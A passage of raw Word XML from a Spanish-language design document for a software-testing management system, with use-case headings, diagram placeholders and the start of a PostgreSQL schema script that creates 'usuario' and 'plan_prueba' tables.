        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="209AF1AA" wp14:editId="7335CE3D">
            <wp:extent cx="5499100" cy="21526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2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B801E21" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7235DEF0" wp14:editId="17B682DE">
            <wp:extent cx="5499100" cy="21526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2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D109A39" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC744DB" wp14:editId="2AA966F8">
            <wp:extent cx="5499100" cy="21526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2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F96C6E" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="4BC164C5" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="5543A4DE" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:t>CU1: Crear plan de prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F18C78B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FDFF0AA" wp14:editId="0D2088EC">
            <wp:extent cx="5731510" cy="1051560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="23" name="Imagen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51560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ABF2BF" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="238C354C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:t>CU2: Ejecutar Plan de pruebas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E56905" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34316D13" wp14:editId="6732333D">
            <wp:extent cx="5731510" cy="1481455"/>
            <wp:effectExtent l="0" t="0" r="254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81455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAB86F" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="046BB105" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="790DFA7B" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="0390152E" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F"/>
    <w:p w14:paraId="50826F70" w14:textId="284F417D" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CU3:Consultar Estado de ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9F1EE" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE493FD" wp14:editId="5B0E08CE">
            <wp:extent cx="5731510" cy="907415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="24" name="Imagen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907415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC313ED" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="2FE0241F" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:t>CU4:Analizar Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D67581" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4474B402" wp14:editId="4C2A7D27">
            <wp:extent cx="5731510" cy="845185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="25" name="Imagen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45185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7266B133" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="68A8DB79" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:t>CU5:Generar Reporte de Prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F8AB2B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15102580" wp14:editId="277B5B4B">
            <wp:extent cx="5731510" cy="1353185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="26" name="Imagen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53185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB4DE9" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="6878D3CF" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:t>CU6: Visualizar Historial de Ejecuciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62A92D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426A2423" wp14:editId="7CF92F06">
            <wp:extent cx="5731510" cy="981075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="27" name="Imagen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981075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0122A7" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="322CC38C" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697EA9C6" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089B2B86" w14:textId="7A56A82C" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DISEÑO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E178C3" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DISEÑO FISICO: DIAGRAMA DE DESPLIEGUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2BCD0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E8DF0FD" wp14:editId="266304D6">
            <wp:extent cx="4819650" cy="262234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380" cy="2627641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04724797" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="2F311F08" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:t>DIAGRAMA ORGANIZADO EN CAPAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A805212" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="77D9400C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBD4103" wp14:editId="5A73DD90">
            <wp:extent cx="3892550" cy="28402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6967" cy="2843499"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="647AFF73" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="5DA6B89D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="60055712" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DISEÑO DE DATOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA26EE" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DIAGRAMA DE CLASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE446AF" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A07D679" wp14:editId="09BBAEC9">
            <wp:extent cx="2110705" cy="35814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365" cy="3589308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7899B0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="19ACE75B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="19344F8C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DISEÑO DE DATOS FISICO SCRIPT</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DC7E43"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888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Crear base de datos (opcional, si no la tienes creada)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E47FFE"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b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CREATE</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DATABASE</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> software_pruebas;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F2133"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p>
    <w:p w14:paraId="5F79408C"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888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Usar la base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE1C58"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FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFAAAA"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>c software_pruebas;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37822925"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p>
    <w:p w14:paraId="17714DBB"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888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Tabla de usuarios (opcional si quieres registrar quién hizo la prueba)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BFB7E0"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CREATE</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TABLE</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>usuario</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE0E61"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    id SERIAL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>PRIMARY</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KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7A5868"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    nombre </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>100</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NOT</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3366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E7E53"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    email </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>100</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UNIQUE</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NOT</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3366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79610965"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB26054"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p>
    <w:p w14:paraId="48263B13"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888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Tabla de planes de prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB52975"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b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CREATE</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TABLE</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>plan_prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A045A60" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001D1995"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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">id SERIAL </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>PRIMARY</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040BEBDF" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001D1995"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1D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    nombre </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
